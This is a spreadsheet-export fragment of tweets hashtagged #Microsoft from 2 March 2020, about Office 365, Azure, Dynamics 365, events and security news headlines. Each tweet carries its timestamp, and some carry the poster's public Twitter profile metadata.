    <t>Looking for an Office 365 administrator to setup, migrate and administer your tenant? Lakunzo will do this and more for $25 on @fiverr @BitTitan @CodeTwoSoftware @zyllio
#Microsoft #serverless #Fiverr #fiverrgigs #fiverrseller #Office365
https://t.co/bb8sHEk4Y3</t>
  </si>
  <si>
    <t>Mon Mar 02 12:39:31 +0000 2020</t>
  </si>
  <si>
    <t>@forrester report on #Microsoft #PowerPlatform - makes for some good reading!
https://t.co/bxT8jeu4hi
#community #poweraddicts #technology #lowcode</t>
  </si>
  <si>
    <t>{'id': 1144670976971550720, 'id_str': '1144670976971550720', 'name': 'EY Kalman', 'screen_name': 'TheCRMNinja', 'location': 'UK', 'description': 'Biker (tweaked ZX9R), Former Skydiver, Teams #D365BlackOps,#PowerAddicts. MS D365/PowerApps Ninja Enthusiast! https://t.co/xAnQH0LdpN', 'url': 'https://t.co/OgUAoDvPee', 'entities': {'url': {'urls': [{'url': 'https://t.co/OgUAoDvPee', 'expanded_url': 'http://aka.ms/thecrmninja', 'display_url': 'aka.ms/thecrmninja', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/xAnQH0LdpN', 'expanded_url': 'http://linkedin.com/in/thecrmninja', 'display_url': 'linkedin.com/in/thecrmninja', 'indices': [110, 133]}]}}, 'protected': False, 'followers_count': 462, 'friends_count': 460, 'listed_count': 3, 'created_at': 'Fri Jun 28 18:16:42 +0000 2019', 'favourites_count': 4672, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2919, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1199696121095962624/sYF4DSFK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199696121095962624/sYF4DSFK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1144670976971550720/1572269439',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</si>
  <si>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12:38:13 +0000 2020</t>
  </si>
  <si>
    <t>@USAIDKenya @USAIDEastAfrica @paulkarma1 @KKiptalam @gkhisa @Jasiala71 @MastercardFdn @nyambiagatahi #Microsoft through the Microsoft Imagine Academy offers free certification to participants in the program. @4Afrika @Microsoftea. Our IT Manager Paul Kamau (@paulkarma1) encourages as many participants to sit the examinations 
#YALITransformation https://t.co/4RYaQpwiSn</t>
  </si>
  <si>
    <t>{'id': 3308011737, 'id_str': '3308011737', 'name': 'YALI RLC EA', 'screen_name': 'YALIRLCEA', 'location': 'Nairobi, Kenya', 'description': 'The YALI Regional Leadership Center East Africa is supported by the American people through the United States Agency for International Development (USAID).', 'url': 'http://t.co/mgyIxcQ2vZ', 'entities': {'url': {'urls': [{'url': 'http://t.co/mgyIxcQ2vZ', 'expanded_url': 'http://www.yalieastafrica.org', 'display_url': 'yalieastafrica.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16559, 'friends_count': 281, 'listed_count': 35, 'created_at': 'Thu Jun 04 10:58:02 +0000 2015', 'favourites_count': 8588, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13939,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'http://pbs.twimg.com/profile_images/606415580116033536/UZ71CGRP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/606415580116033536/UZ71CGRP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3308011737/1575021000', 'profile_link_color': '003D7D',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</si>
  <si>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12:38:12 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 Version 2004 Continues Creeping Towards Release.. #windows10 #microsoft #win102004 https://t.co/xChYdYide4 https://t.co/8uQTBHxGcU</t>
  </si>
  <si>
    <t>Mon Mar 02 12:36:16 +0000 2020</t>
  </si>
  <si>
    <t>@Azure tip of the day:
#Microsoft #microsoftazure #Azure #backup #linkedinlearning
https://t.co/TVhRPofbU4</t>
  </si>
  <si>
    <t>Mon Mar 02 12:34:29 +0000 2020</t>
  </si>
  <si>
    <t>#Cohort36 had an outstanding number in #Microsoft certifications.  40 certificates awarded which is the second highest number after #Cohort25 which had 45. Congratulations young leaders for this great result.  
#YALITransformation https://t.co/zUwFD6AeUo</t>
  </si>
  <si>
    <t>Mon Mar 02 12:31:32 +0000 2020</t>
  </si>
  <si>
    <t>2020 Microsoft Imagine Cup Asia Finals: Indian team makes it to top 3 
#TechForGood #Microsoft #ImagineCup
https://t.co/44nbG35iOo</t>
  </si>
  <si>
    <t>Mon Mar 02 12:30:39 +0000 2020</t>
  </si>
  <si>
    <t>#GoldPartner #Microsoft #Salesforce use #Prosci framework for #cloudadoption #accelerateadoption engaging leaders and end-users with #adkar - #getcertified in Neuchatel 25.-27.03. register here: https://t.co/MAa555e8y4  (3 training days, 2 overnight stays, meals, all included) https://t.co/8h7NoxWZs4</t>
  </si>
  <si>
    <t>Mon Mar 02 12:30:20 +0000 2020</t>
  </si>
  <si>
    <t>Why should modern organisations pair AI with D365 Field Service? This blog might have the answers you are looking for https://t.co/Woi6aPRT7X
#WeAreBraintree #Microsoft #FieldService</t>
  </si>
  <si>
    <t>{'id': 854693450998059008, 'id_str': '854693450998059008', 'name': 'Braintree by Vox', 'screen_name': 'braintree_za', 'location': '1 Scott Street, Waverley, Johannesburg, South Africa', 'description': "We're the largest Microsoft Dynamics company in Africa with significant consulting &amp; product capability; including Dynamics ERP, CRM, SharePoint &amp; Office 365.", 'url': 'https://t.co/F8mUbUosHB', 'entities': {'url': {'urls': [{'url': 'https://t.co/F8mUbUosHB', 'expanded_url': 'http://www.braintree.co.za/', 'display_url': 'braintree.co.za', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 94, 'friends_count': 151, 'listed_count': 1, 'created_at': 'Wed Apr 19 13:49:32 +0000 2017', 'favourites_count': 220, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 479,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'http://pbs.twimg.com/profile_images/1122847873144696832/bLLD6LIW_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1122847873144696832/bLLD6LIW_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/854693450998059008/1582176763',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</si>
  <si>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12:30:04 +0000 2020</t>
  </si>
  <si>
    <t>Learn how Microsoft Azure Information Protection Secures Power BI Data in Healthcare https://t.co/Sh7OeteryU #microsoft #security  #MSF... https://t.co/0UCExMhmyi</t>
  </si>
  <si>
    <t>Mon Mar 02 12:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Check out our latest service offerings to accelerate your governance, compliance, security and monitoring journey in #Microsoft #Azure and #Office365 https://t.co/aiHfKKsHMb</t>
  </si>
  <si>
    <t>{'id': 867093758621478913, 'id_str': '867093758621478913', 'name': 'CLOUDignition', 'screen_name': 'CLOUDignition', 'location': '', 'description': 'Turn-key cloud solutions and consulting for #Azure and #Office365', 'url': 'https://t.co/9YOrdx1GI7', 'entities': {'url': {'urls': [{'url': 'https://t.co/9YOrdx1GI7', 'expanded_url': 'https://cloudignition.net', 'display_url': 'cloudignition.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 79, 'listed_count': 0, 'created_at': 'Tue May 23 19:03:56 +0000 2017', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 282,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'http://pbs.twimg.com/profile_images/867506285390049282/0qfkqc4a_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/867506285390049282/0qfkqc4a_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/867093758621478913/1559937384', 'profile_link_color': 'FF8200',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</si>
  <si>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12:26:18 +0000 2020</t>
  </si>
  <si>
    <t>Risk Management &amp;amp; Azure Sentinal - check out Microsoft's 6 key announcements from #RSAC - one of the world's largest security conferences
#Security #Microsoft #CIO https://t.co/anmVsvFKl1</t>
  </si>
  <si>
    <t>Mon Mar 02 12:19:16 +0000 2020</t>
  </si>
  <si>
    <t>Want to sign in with #Microsoft to POEditor? Now you can. 
#localization #translation #l10n</t>
  </si>
  <si>
    <t>{'id': 873627661, 'id_str': '873627661', 'name': 'POEditor', 'screen_name': 'POEditor', 'location': '', 'description': 'Collaborative localization platform, designed to easily translate software like websites, desktop and mobile apps, games and more!', 'url': 'https://t.co/fuCQsMDr1a', 'entities': {'url': {'urls': [{'url': 'https://t.co/fuCQsMDr1a', 'expanded_url': 'https://poeditor.com/', 'display_url': 'poeditor.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1200, 'friends_count': 125, 'listed_count': 49, 'created_at': 'Thu Oct 11 13:27:14 +0000 2012', 'favourites_count': 176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 706,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'http://pbs.twimg.com/profile_images/450536531283820544/H_uSchVG_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/450536531283820544/H_uSchVG_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/873627661/1563453215', 'profile_link_color': '34CBA2',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</si>
  <si>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Mon Mar 02 12:17:13 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, the ID2020 Alliance, universal digital identification and you https://t.co/aD4QKbPzBR #microsoft</t>
  </si>
  <si>
    <t>{'id': 926022189899485184, 'id_str': '926022189899485184', 'name': 'The Innovation Times', 'screen_name': 'inntimes', 'location': 'Georgia', 'description': "We aren't Trainers, We are Innovators and Tech Designers. Weâ€™ve developed innovative  process to get a diverse range of ideas and Build solutions", 'url': 'https://t.co/N7ghIpoOaT', 'entities': {'url': {'urls': [{'url': 'https://t.co/N7ghIpoOaT', 'expanded_url': 'https://intimes.wordpress.com/', 'display_url': 'intimes.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 54, 'friends_count': 265, 'listed_count': 1, 'created_at': 'Thu Nov 02 09:44:29 +0000 2017', 'favourites_count': 30, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1423, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/926023180409626624/5iQ2lJuk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/926023180409626624/5iQ2lJuk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/926022189899485184/1511190937',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</si>
  <si>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12:14:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft cancels IoT in Action event in #Melbourne https://t.co/Szl0LIP4p3</t>
  </si>
  <si>
    <t>Mon Mar 02 12:12:54 +0000 2020</t>
  </si>
  <si>
    <t>20200229. Interesting Sessions!Exciting moments! #PMIUAE #Microsoft #TheFutureofWork https://t.co/xamtAVWXu4</t>
  </si>
  <si>
    <t>{'id': 318344931, 'id_str': '318344931', 'name': 'Olufemi Ogunye', 'screen_name': 'FemiOmoJava', 'location': 'Dubai, United Arab Emirates', 'description': '| Enterprise Developer | AWS Cloud Architect | IT Project Manager | Trainer | Tech Lead @garantdubai | Webmaster @PMIUAEChapter | #BeyondDABorders |', 'url': 'https://t.co/ekZbeKutPM', 'entities': {'url': {'urls': [{'url': 'https://t.co/ekZbeKutPM', 'expanded_url': 'http://www.omojava.com', 'display_url': 'omojava.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 729, 'friends_count': 513, 'listed_count': 13, 'created_at': 'Thu Jun 16 10:23:41 +0000 2011', 'favourites_count': 451, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9934,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'http://pbs.twimg.com/profile_images/1112648204280049667/aT0UUL5S_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1112648204280049667/aT0UUL5S_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/318344931/1547962934',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</si>
  <si>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12:11:22 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft is trying to reduce unexpected Windows Update-induced.... #computer #gadgetspic https://t.co/9yVyIg7XIc https://t.co/J0cicylg89</t>
  </si>
  <si>
    <t>{'id': 752041248027009025, 'id_str': '752041248027009025', 'name': 'Gary Feng', 'screen_name': 'garyfengg', 'location': 'Los Angeles, CA', 'description': 'Living on the.... edge...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4766, 'friends_count': 4701, 'listed_count': 32, 'created_at': 'Sun Jul 10 07:26:20 +0000 2016', 'favourites_count': 11848, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3327,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'http://pbs.twimg.com/profile_images/784467536008151040/8z5HuF-1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/784467536008151040/8z5HuF-1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/752041248027009025/1475866562',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</si>
  <si>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12:09:05 +0000 2020</t>
  </si>
  <si>
    <t>ICYMI #Microsoft Azure Sphere #IoT 
Thanks for link @JMOTA3 https://t.co/cjGOTFkWda</t>
  </si>
  <si>
    <t>{'id': 24825300, 'id_str': '24825300', 'name': 'Barry Grossman', 'screen_name': 'barryjgrossman', 'location': '07030', 'description': 'Remote Broadcast Production Services\nSystems Design and Integration Engineer / Technical Management  / EIC', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 845, 'friends_count': 778, 'listed_count': 115, 'created_at': 'Tue Mar 17 02:42:06 +0000 2009', 'favourites_count': 13041, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 42768,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'http://pbs.twimg.com/profile_images/799233377744392193/go2YWtVb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/799233377744392193/go2YWtVb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24825300/1466884066',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</si>
  <si>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Mon Mar 02 12:04:11 +0000 2020</t>
  </si>
  <si>
    <t>Risk Management &amp;amp; Azure Sentinal - check out Microsoft's 6 key announcements from #RSAC - one of the world's largest security conferences
#Security #Microsoft #CIO https://t.co/LGykea0ZRM</t>
  </si>
  <si>
    <t>{'id': 3041338055, 'id_str': '3041338055', 'name': 'Alex Bain', 'screen_name': 'AlexB_Bain', 'location': 'London, England', 'description': 'My passions are sport, business, global trade, systems &amp; tech. Always enthusiastic to learn more...', 'url': 'https://t.co/QZHhkTP5tu', 'entities': {'url': {'urls': [{'url': 'https://t.co/QZHhkTP5tu', 'expanded_url': 'https://za.linkedin.com/in/alex-bain-55bab9b5', 'display_url': 'za.linkedin.com/in/alex-bain-5â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 104, 'friends_count': 506, 'listed_count': 3, 'created_at': 'Mon Feb 16 20:05:47 +0000 2015', 'favourites_count': 103, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 393,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'http://pbs.twimg.com/profile_images/852063982982766592/l7Ze9QXL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/852063982982766592/l7Ze9QXL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3041338055/1494102492', 'profile_link_color': '1A1B1F',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</si>
  <si>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12:01:48 +0000 2020</t>
  </si>
  <si>
    <t>Unfortunately the Ignite The Tour in Zurich was cancelled due to the corona virus. But the next #Events are already coming up: https://t.co/ZIz1zDKPMV
We would be happy to see you at one of the #events.
#baseVISION #baseVISIONonTour #Events #CoronaVirus #Microsoft #Microsoft365</t>
  </si>
  <si>
    <t>{'id': 4062691071, 'id_str': '4062691071', 'name': 'baseVISION AG', 'screen_name': 'basevision', 'location': 'Switzerland', 'description': 'Your Mobile and Secure Workplace. Our Passion.', 'url': 'https://t.co/00OFiuGZmq', 'entities': {'url': {'urls': [{'url': 'https://t.co/00OFiuGZmq', 'expanded_url': 'http://www.basevision.ch', 'display_url': 'basevision.ch', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 231, 'friends_count': 762, 'listed_count': 14, 'created_at': 'Wed Oct 28 19:36:43 +0000 2015', 'favourites_count': 754, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1473, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3B94D9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/679599003147878400/Dq75lxrF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/679599003147878400/Dq75lxrF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4062691071/1452860053', 'profile_link_color': 'F2910C',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</si>
  <si>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12:00:06 +0000 2020</t>
  </si>
  <si>
    <t>Check out the great roundup of content posted in February to the HLS Blog. Samantha Brown https://t.co/emJr3OPiyI #microsoft #healthca... https://t.co/NvicW0XJIp</t>
  </si>
  <si>
    <t>Mon Mar 02 12:00:05 +0000 2020</t>
  </si>
  <si>
    <t>Attackers look around for #Microsoft #Exchange servers for #RCE vulnerability. #infosec #cve #PatchTuesday #ITSecurity https://t.co/eAiTIRMEL6</t>
  </si>
  <si>
    <t>{'id': 25445345, 'id_str': '25445345', 'name': 'Mr. Becwar', 'screen_name': 'rbecwar', 'location': 'Nashville, TN', 'description': 'Husband | Father | Splunker | Information Security Professional |  Security Researcher | ATT&amp;CK Contributor | Home Brewer | Community Activist', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 38, 'friends_count': 175, 'listed_count': 1, 'created_at': 'Fri Mar 20 02:52:23 +0000 2009', 'favourites_count': 46, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 288,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'http://pbs.twimg.com/profile_images/1110524730900168709/yDQVUN0i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110524730900168709/yDQVUN0i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/25445345/1518660151',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</si>
  <si>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Mon Mar 02 12:00:03 +0000 2020</t>
  </si>
  <si>
    <t>Cerner moves to the #cloud for a single source of truth in asset and configuration management - #Microsoft #PowerBI #AI #Azure David Dvorak https://t.co/DUxIetGKap #MSFTAdvocate</t>
  </si>
  <si>
    <t>Mon Mar 02 11:56:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft #Dynamics365 follows a continuous release cycle - with major automatic updates taking place twice a year (April and October). #Microsoft recently published details of the April (Wave 1) release for 2020. Read our latest article to find out more: https://t.co/8R35DuUFyV https://t.co/8BnLFbMwIm</t>
  </si>
  <si>
    <t>{'id': 33867462, 'id_str': '33867462', 'name': 'Chorus', 'screen_name': 'wearechorus', 'location': 'Bristol, UK', 'description': 'Using technology to put people first.\nFriendly experts in #Office365 #Azure #SharePoint #MSDyn365 #CRM #Umbraco.', 'url': 'http://t.co/Wgvi7D2teH', 'entities': {'url': {'urls': [{'url': 'http://t.co/Wgvi7D2teH', 'expanded_url': 'http://www.chorus.co', 'display_url': 'chorus.co', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 904, 'friends_count': 542, 'listed_count': 235, 'created_at': 'Tue Apr 21 10:27:35 +0000 2009', 'favourites_count': 885, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6548,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'http://pbs.twimg.com/profile_images/991691796106371072/ZTFc6Ont_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/991691796106371072/ZTFc6Ont_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33867462/1525278087', 'profile_link_color': '981CEB',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</si>
  <si>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11:55:06 +0000 2020</t>
  </si>
  <si>
    <t>11 reasons users still hate your software https://t.co/VG7GklnOnt via @HYBRID_CIRCLE #Microsoft #VMware https://t.co/JDoj7L3cf1</t>
  </si>
  <si>
    <t>Mon Mar 02 11:53:41 +0000 2020</t>
  </si>
  <si>
    <t>ITS ARRIVED!! Excitement in the office today as we are one of the first in the UK to receive the #HoloLens2 #microsoft
#AugmentedReality #technology #happymonday https://t.co/DWFc7s1FJ4</t>
  </si>
  <si>
    <t>Mon Mar 02 11:52:00 +0000 2020</t>
  </si>
  <si>
    <t>For a limited time only, weve partnered with #AvePoint and #Microsoft to introduce our FY20 FREE #Migration #Offer for net new seats of #Office365BusinessPremium or #Microsoft365. Learn more about how you can qualify and take advantage of this offer here: https://t.co/ozDpNFiXaM https://t.co/ZlcizgKD91</t>
  </si>
  <si>
    <t>Mon Mar 02 11:49:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Teams Live Events Webcast recording #microsoft #microsoftteams https://t.co/CoKa3j7eht</t>
  </si>
  <si>
    <t>Mon Mar 02 11:44:29 +0000 2020</t>
  </si>
  <si>
    <t>Tip of the Week: Functional Excel Features https://t.co/6HJtPXWaHH #microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 11:44:02 +0000 2020</t>
  </si>
  <si>
    <t>These are the skills South Africa needs to compete in the 4th Industrial Revolution https://t.co/rHO2Ysi3Sk #Microsoft #IDC https://t.co/zvJjUKg2Yg</t>
  </si>
  <si>
    <t>{'id': 42634799, 'id_str': '42634799', 'name': 'TechSmart', 'screen_name': 'TechSmartZA', 'location': 'South Africa', 'description': 'Get the latest tech news and reviews,and IT/business insight at https://t.co/cEQvIG0Ajx.', 'url': 'https://t.co/NwunercMkr', 'entities': {'url': {'urls': [{'url': 'https://t.co/NwunercMkr', 'expanded_url': 'http://www.techsmart.co.za/', 'display_url': 'techsmart.co.za', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/cEQvIG0Ajx', 'expanded_url': 'http://www.techsmart.co.za', 'display_url': 'techsmart.co.za', 'indices': [64, 87]}]}}, 'protected': False, 'followers_count': 9147, 'friends_count': 2245, 'listed_count': 223, 'created_at': 'Tue May 26 14:30:25 +0000 2009', 'favourites_count': 1818, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 22464,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'http://pbs.twimg.com/profile_images/788638973686054912/fbkaL-Es_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/788638973686054912/fbkaL-Es_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/42634799/1444833465', 'profile_link_color': 'DD2E44', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 11:43:50 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Live Gold Games of the month in March.
https://t.co/VswFL8Dgtd
 German within - March 1 to 31
 Shantae: half-Genius Hero - March 16 to April 15
 Castlevania: The Lord of the show 2 -  1 to 15 March
 Black Generation - March 16 to 31
#Xbox #XboxLiveGold #Microsoft</t>
  </si>
  <si>
    <t>{'id': 889472258980368384, 'id_str': '889472258980368384', 'name': 'Ashena', 'screen_name': 'AshenaSeir', 'location': '', 'description': 'ðŸ¦Š Meep !  ðŸŽ® Twitch affiliate ðŸŽ®\nhttps://t.co/MlZHGzHQFA\n #TwitchKittens #Lurkforce', 'url': 'https://t.co/sBqg5o6pH5', 'entities': {'url': {'urls': [{'url': 'https://t.co/sBqg5o6pH5', 'expanded_url': 'https://www.facebook.com/AshenaSeir/', 'display_url': 'facebook.com/AshenaSeir/', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/MlZHGzHQFA', 'expanded_url': 'https://www.twitch.tv/ashena', 'display_url': 'twitch.tv/ashena', 'indices': [31, 54]}]}}, 'protected': False, 'followers_count': 190, 'friends_count': 161, 'listed_count': 0, 'created_at': 'Mon Jul 24 13:08:06 +0000 2017', 'favourites_count': 1155, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 582,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'http://pbs.twimg.com/profile_images/1118618001409028097/ckXPyrvN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118618001409028097/ckXPyrvN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/889472258980368384/1548444484',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</si>
  <si>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11:38:09 +0000 2020</t>
  </si>
  <si>
    <t>Learn how technology Is shaping the patient experience in healthcare. https://t.co/qT4s855Fta #microsoft #healthcare  #MSFTAdvocate https://t.co/8hZAJPBw54</t>
  </si>
  <si>
    <t>Mon Mar 02 11:34:40 +0000 2020</t>
  </si>
  <si>
    <t>IAM Platform Curated Retweet:
Via: https://t.co/yZmNkxlTac
UN admits data breach from unpatched sharepoint vulnerability 
https://t.co/yiiL58Oogl
#CyberCrime #UN #DataBreach #SharePoint #Vulnerability #Microsoft #CyberSecurity #InfoSec #Hackers #I</t>
  </si>
  <si>
    <t>{'id': 226310002, 'id_str': '226310002', 'name': 'IAM Platform', 'screen_name': 'IAM__Network', 'location': 'Worldwide', 'description': "Information Access Management Platform's Official Twitter.\n\nWatch and Be Ready.\n\n~", 'url': 'https://t.co/T1FCdoOFoB', 'entities': {'url': {'urls': [{'url': 'https://t.co/T1FCdoOFoB', 'expanded_url': 'https://www.iammarketingmedia.com', 'display_url': 'iammarketingmedia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16299, 'friends_count': 13193, 'listed_count': 3400, 'created_at': 'Mon Dec 13 21:24:29 +0000 2010', 'favourites_count': 64551, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 543623, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '94D487', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/701708113653669888/Nzm67hhC_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/701708113653669888/Nzm67hhC_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/226310002/1568937917', 'profile_link_color': '3366CC',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</si>
  <si>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24 Hours to go!
Should be a great night with talks from @JoeHodkinson  talking about #DevOps &amp;amp; @mbradl03 talking about securing #Azure #Networks.
Giveaways too! The Unicorn Project &amp;amp; Phoenix Project
#NAUG #Cloud #Microsoft 
https://t.co/s2cUK1xqHL</t>
  </si>
  <si>
    <t>Mon Mar 02 11:30:27 +0000 2020</t>
  </si>
  <si>
    <t>Top Stories from the #Microsoft #DevOps Community  2020.02.28 - https://t.co/xT9LHrL7gn</t>
  </si>
  <si>
    <t>{'id': 861524424545185794, 'id_str': '861524424545185794', 'name': 'IdeaStudio', 'screen_name': 'ideastud_io', 'location': 'Paris, France', 'description': "#IdeaStudio c'est du #digital pour les entreprises. Nos dÃ©veloppeurs ont la #libertÃ© du #freelance. #IdeaStudio Ã©volue vers l'Ã©dition de #logiciels.", 'url': 'https://t.co/y2yhLE7IgI', 'entities': {'url': {'urls': [{'url': 'https://t.co/y2yhLE7IgI', 'expanded_url': 'http://ideastud.io', 'display_url': 'ideastud.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 56, 'friends_count': 82, 'listed_count': 0, 'created_at': 'Mon May 08 10:13:23 +0000 2017', 'favourites_count': 40, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 869,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'http://pbs.twimg.com/profile_images/1062271995080044544/15tO2JC1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1062271995080044544/15tO2JC1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/861524424545185794/1568468452', 'profile_link_color': '424D58',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</si>
  <si>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11:29:59 +0000 2020</t>
  </si>
  <si>
    <t>Are you planning to make the next move in your cloud #career? This blog https://t.co/oC0bBgPSDa will help you to make the right decision.
#Microsoft #cloud #AWS #CloudComputing #MondayMotivation</t>
  </si>
  <si>
    <t>{'id': 523340980, 'id_str': '523340980', 'name': 'Edureka!', 'screen_name': 'edurekaIN', 'location': 'India', 'description': "We're a ridiculously committed online education platform providing courses in Big Data &amp; Analytics, Cloud Computing, Programming &amp; other trending technologies.", 'url': 'http://t.co/Dx5egk4jYS', 'entities': {'url': {'urls': [{'url': 'http://t.co/Dx5egk4jYS', 'expanded_url': 'http://www.edureka.co', 'display_url': 'edureka.co', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5048, 'friends_count': 791, 'listed_count': 250, 'created_at': 'Tue Mar 13 14:58:44 +0000 2012', 'favourites_count': 8013, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9509,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'http://pbs.twimg.com/profile_images/1210560351713890304/IfLE3NrY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210560351713890304/IfLE3NrY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/523340980/1577803248', 'profile_link_color': '0575B3',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</si>
  <si>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Mon Mar 02 11:29:38 +0000 2020</t>
  </si>
  <si>
